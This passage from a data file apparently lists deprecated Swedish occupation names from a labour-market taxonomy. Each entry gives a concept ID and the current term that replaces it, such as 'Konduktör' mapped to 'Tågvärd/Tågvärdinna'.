{'taxonomy/concept': {'taxonomy/id': '6qFX_Cmu_o5U', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Näringsfrihetsombudsman',
'taxonomy/preferred-label': 'Näringsfrihetsombudsman', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7J2i_94b_ow4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Fastighetsdirektör', 'taxonomy/preferred-label': 'Fastighetsdirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'wUKi_LRW_Wxk', 'taxonomy/definition': 'Fastighetschef/Fastighetsdirektör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Fastighetschef/Fastighetsdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nHFx_RFe_giS', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Ekonomiledare', 'taxonomy/preferred-label': 'Ekonomiledare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iCy6_G72_abh', 'taxonomy/definition': 'Ekonomichef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ekonomichef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'qic5_pQo_xhT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Länsassessor', 'taxonomy/preferred-label': 'Länsassessor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'U9AU_Rre_pbM', 'taxonomy/definition': 'Assessor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Assessor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Qgmk_7Xb_z4q', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Socialdirektör', 'taxonomy/preferred-label': 'Socialdirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jn3U_UTt_PUJ', 'taxonomy/definition': 'Socialchef/Socialdirektör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Socialchef/Socialdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'noSX_WNd_Nxv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsbyggnadsdirektör',
'taxonomy/preferred-label': 'Stadsbyggnadsdirektör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'DWv2_Yu9_yo6',
'taxonomy/definition': 'Stadsbyggnadschef/Stadsbyggnadsdirektör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Stadsbyggnadschef/Stadsbyggnadsdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'SpMJ_sSm_Vjp', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Teknisk direktör, kommun',
'taxonomy/preferred-label': 'Teknisk direktör, kommun', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'iJfW_Lt2_sQt', 'taxonomy/definition': 'Teknisk chef, kommun',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Teknisk chef, kommun'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kNQH_LXD_eLe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'IT-revisor', 'taxonomy/preferred-label': 'IT-revisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'jNaB_ozm_pm7', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Internatföreståndare',
'taxonomy/preferred-label': 'Internatföreståndare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'VKcv_Mbu_KJE',
'taxonomy/definition': 'Internatföreståndare/Skolmåltidsföreståndare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Internatföreståndare/Skolmåltidsföreståndare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '44uM_XPP_VdK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Parkeringsvakt', 'taxonomy/preferred-label': 'Parkeringsvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'rfpp_bnQ_RoQ', 'taxonomy/definition': 'Parkeringsvakt/Trafikövervakare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Parkeringsvakt/Trafikövervakare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ybqj_FXq_K98', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skeppsklarerare/Waterclerk',
'taxonomy/preferred-label': 'Skeppsklarerare/Waterclerk', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'eXwZ_gVJ_39q', 'taxonomy/definition': 'Fartygsagent/Fartygsklarerare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Fartygsagent/Fartygsklarerare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nrya_iNN_6BR', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dataregistrerare', 'taxonomy/preferred-label': 'Dataregistrerare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jqVE_Ux3_VMN', 'taxonomy/definition': 'Dataregistrerare/Registrerare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Dataregistrerare/Registrerare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'zKqM_a5a_29j', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Traffic', 'taxonomy/preferred-label': 'Traffic',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'p3m5_Ndd_6im', 'taxonomy/definition': 'Annonsmottagare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Annonsmottagare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'qtPc_BJB_SYL', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Badvakt', 'taxonomy/preferred-label': 'Badvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GUHc_KyJ_Dst', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Artistförmedlare', 'taxonomy/preferred-label': 'Artistförmedlare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '2LBV_CoV_iEf', 'taxonomy/definition': 'Artistagent/Artistbokare/Artistförmedlare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Artistagent/Artistbokare/Artistförmedlare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'MopY_AvK_MmE', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skolledare', 'taxonomy/preferred-label': 'Skolledare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'j6P1_gJq_a2Q', 'taxonomy/definition': 'Skolchef/Skoldirektör/Skolledare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Skolchef/Skoldirektör/Skolledare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'JGxJ_pEB_yre', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dekoratör', 'taxonomy/preferred-label': 'Dekoratör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'GTFy_iPM_msj', 'taxonomy/definition': 'Butikskommunikatör/Visual merchandiser',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Butikskommunikatör/Visual merchandiser'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'cJ62_FKk_ua6', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kontrollingenjör, elkraft',
'taxonomy/preferred-label': 'Kontrollingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'iXyv_E2W_cqc', 'taxonomy/definition': 'Kontrollanläggningstekniker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kontrollanläggningstekniker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4Ujg_KC9_cLT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Vapenmekaniker', 'taxonomy/preferred-label': 'Vapenmekaniker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KiD2_B8H_U7U', 'taxonomy/definition': 'Vapentekniker', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Vapentekniker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 't2pX_4bB_xCG', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Bildingenjör', 'taxonomy/preferred-label': 'Bildingenjör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'm8ED_BbT_twk', 'taxonomy/definition': 'Bildingenjör/BING, film/BING, TV',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Bildingenjör/BING, film/BING, TV'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dh7h_HbH_Cus', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Företagsledare', 'taxonomy/preferred-label': 'Företagsledare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nvUH_JLD_s4F', 'taxonomy/definition': 'Verkställande direktör/VD',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Verkställande direktör/VD'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '5Nkq_7DE_hoo', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Byggmästare', 'taxonomy/preferred-label': 'Byggmästare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'NZcr_uB1_6rX', 'taxonomy/definition': 'Platschef, bygg',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Platschef, bygg'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'saUi_aP6_zhU', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dansare, show', 'taxonomy/preferred-label': 'Dansare, show',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'euJP_wxo_skF', 'taxonomy/definition': 'Dansare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Dansare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4i7D_pQL_DNa', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, produktion, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, produktion, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'XZrs_VW9_31C', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, kvalitet, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, kvalitet, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'p4vQ_Dpo_d6a', 'taxonomy/definition': 'Elkvalitetsanalytiker, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Elkvalitetsanalytiker, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Be1K_Dp4_DrD', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, kontroll, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, kontroll, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'fYBk_dfW_DJc',
'taxonomy/definition': 'Kontrollanläggningsingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kontrollanläggningsingenjör, elkraft'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'WhsT_BWb_dPy', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, konstruktion, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, konstruktion, elkraft',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4QjK_RpG_h4w', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, drift och underhåll, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, drift och underhåll, elkraft',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Yyn9_wQV_Wb8', 'taxonomy/definition': 'Underhållsanalytiker, elkraft',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Underhållsanalytiker, elkraft'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GtGP_PiD_yRc', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilingenjör, anläggning, elkraft',
'taxonomy/preferred-label': 'Civilingenjör, anläggning, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'FuJx_cGT_5im', 'taxonomy/definition': 'Civilingenjör, elkraft',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Civilingenjör, elkraft'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nr69_xvF_c4f', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Barnombudsman', 'taxonomy/preferred-label': 'Barnombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'MGBV_LVk_AtK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Användbarhetsdesigner',
'taxonomy/preferred-label': 'Användbarhetsdesigner', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'QQjZ_NAN_bDR', 'taxonomy/definition': 'Interaktionsdesigner',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Interaktionsdesigner'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'HciA_Cu7_FXt', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Användbarhetsexpert',
'taxonomy/preferred-label': 'Användbarhetsexpert', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'QQjZ_NAN_bDR', 'taxonomy/definition': 'Interaktionsdesigner',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Interaktionsdesigner'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'fdZE_y62_wdE', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsdirektör', 'taxonomy/preferred-label': 'Stadsdirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'dRXp_E2C_Lq9', 'taxonomy/definition': 'Kommunchef/Kommundirektör/Stadsdirektör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kommunchef/Kommundirektör/Stadsdirektör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Eo4y_EGW_KVM', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Produktionsingenjör, elkraft',
'taxonomy/preferred-label': 'Produktionsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'twUU_T1n_hW5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Landstingsrevisor', 'taxonomy/preferred-label': 'Landstingsrevisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'aWNX_iEg_NhN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Konstruktör, elkraft',
'taxonomy/preferred-label': 'Konstruktör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7ava_ohk_66H', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kommunrevisor', 'taxonomy/preferred-label': 'Kommunrevisor',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'KhbC_P4c_R82', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kanslichef, kommun', 'taxonomy/preferred-label': 'Kanslichef, kommun',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'V74g_m5Z_BtM', 'taxonomy/definition': 'Kanslichef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kanslichef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ohrC_dLP_3ad', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Civilförsvarschef', 'taxonomy/preferred-label': 'Civilförsvarschef',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'cB4Q_Cx9_2Lw', 'taxonomy/definition': 'Beredskapsdirektör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Beredskapsdirektör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'tnaT_rPT_RXj', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Konduktör', 'taxonomy/preferred-label': 'Konduktör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KMRG_Bda_5CV', 'taxonomy/definition': 'Tågvärd/Tågvärdinna',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Tågvärd/Tågvärdinna'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7yzW_dCg_7s7', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kommundirektör', 'taxonomy/preferred-label': 'Kommundirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'dRXp_E2C_Lq9', 'taxonomy/definition': 'Kommunchef/Kommundirektör/Stadsdirektör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kommunchef/Kommundirektör/Stadsdirektör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '9wyj_ibD_Yo1', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalsekreterare',
'taxonomy/preferred-label': 'Personalsekreterare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'ofiS_5F2_YmV', 'taxonomy/definition': 'HR-assistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'HR-assistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'qV9q_oKv_QzL', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Turnéproducent för utställningar',
'taxonomy/preferred-label': 'Turnéproducent för utställningar', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'FcaP_vhz_Cuy',
'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'WAH4_sSf_GyE', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Utställningskoordinator',
'taxonomy/preferred-label': 'Utställningskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'SV22_7W1_pFT',
'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Jsct_XQW_U8u', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Utställningsproducent',
'taxonomy/preferred-label': 'Utställningsproducent', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'FcaP_vhz_Cuy',
'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '5GaR_6HQ_8vY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Talboksproducent', 'taxonomy/preferred-label': 'Talboksproducent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FcaP_vhz_Cuy', 'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'RSra_C73_mJe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Undertextare', 'taxonomy/preferred-label': 'Undertextare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'S2QW_12u_Pj1', 'taxonomy/definition': 'Mediatextare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Mediatextare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'HcpH_1h7_vkK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Nyhetstextare', 'taxonomy/preferred-label': 'Nyhetstextare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'S2QW_12u_Pj1', 'taxonomy/definition': 'Mediatextare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Mediatextare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'PM4A_xoG_hQD', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Svensktextare', 'taxonomy/preferred-label': 'Svensktextare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'S2QW_12u_Pj1', 'taxonomy/definition': 'Mediatextare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Mediatextare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7fB3_Ckh_NuC', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Musiker, folkmusik', 'taxonomy/preferred-label': 'Musiker, folkmusik',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'UCXb_LjK_pHv', 'taxonomy/definition': 'Musiker', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Musiker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'XSoL_LLU_PYV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Eventproducent', 'taxonomy/preferred-label': 'Eventproducent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FcaP_vhz_Cuy', 'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'wniw_g2F_JNQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Inspelningskoordinator',
'taxonomy/preferred-label': 'Inspelningskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'SV22_7W1_pFT',
'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'wiGD_eu2_UJV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Musikproducent', 'taxonomy/preferred-label': 'Musikproducent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'FcaP_vhz_Cuy', 'taxonomy/definition': 'Producent: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Producent: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7rkC_Rot_tat', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sångare, folkmusik', 'taxonomy/preferred-label': 'Sångare, folkmusik',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'k3ZW_16R_riY', 'taxonomy/definition': 'Sångare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Sångare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'aR3a_5Ly_TDw', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Musiker, klassisk musik',
'taxonomy/preferred-label': 'Musiker, klassisk musik', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'UCXb_LjK_pHv', 'taxonomy/definition': 'Musiker',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Musiker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YmFo_cvw_1Kv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Produktionskoordinator',
'taxonomy/preferred-label': 'Produktionskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'SV22_7W1_pFT',
'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dnxZ_Bvb_S9C', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Platskoordinator', 'taxonomy/preferred-label': 'Platskoordinator',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'SV22_7W1_pFT', 'taxonomy/definition': 'Koordinator: kultur, media, film, dataspel',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Koordinator: kultur, media, film, dataspel'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Kh3N_Kg8_KK5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Automationsingenjör, elkraft',
'taxonomy/preferred-label': 'Automationsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kHno_7rL_Lcm', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjuksköterska, geriatrisk vård',
'taxonomy/preferred-label': 'Sjuksköterska, geriatrisk vård', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'uaJs_9YA_Cnp',
'taxonomy/definition': 'Sjuksköterska, geriatrik/Sjuksköterska, äldreomsorg och äldrevård',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Sjuksköterska, geriatrik/Sjuksköterska, äldreomsorg och äldrevård'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'UjqL_rhp_jC4', 'taxonomy/type': 'occupation-name',
